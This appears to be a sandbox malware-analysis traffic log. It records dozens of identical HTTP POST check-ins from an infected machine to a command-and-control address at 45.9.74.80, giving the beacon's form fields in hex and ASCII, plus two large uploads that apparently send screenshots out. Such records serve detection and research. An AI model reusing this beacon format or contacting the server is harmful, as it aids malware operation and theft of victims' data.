                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTY4OTU=Host: 45.9.74.80Content-Length: 97047Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTY5MjQ=Host: 45.9.74.80Content-Length: 97076Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
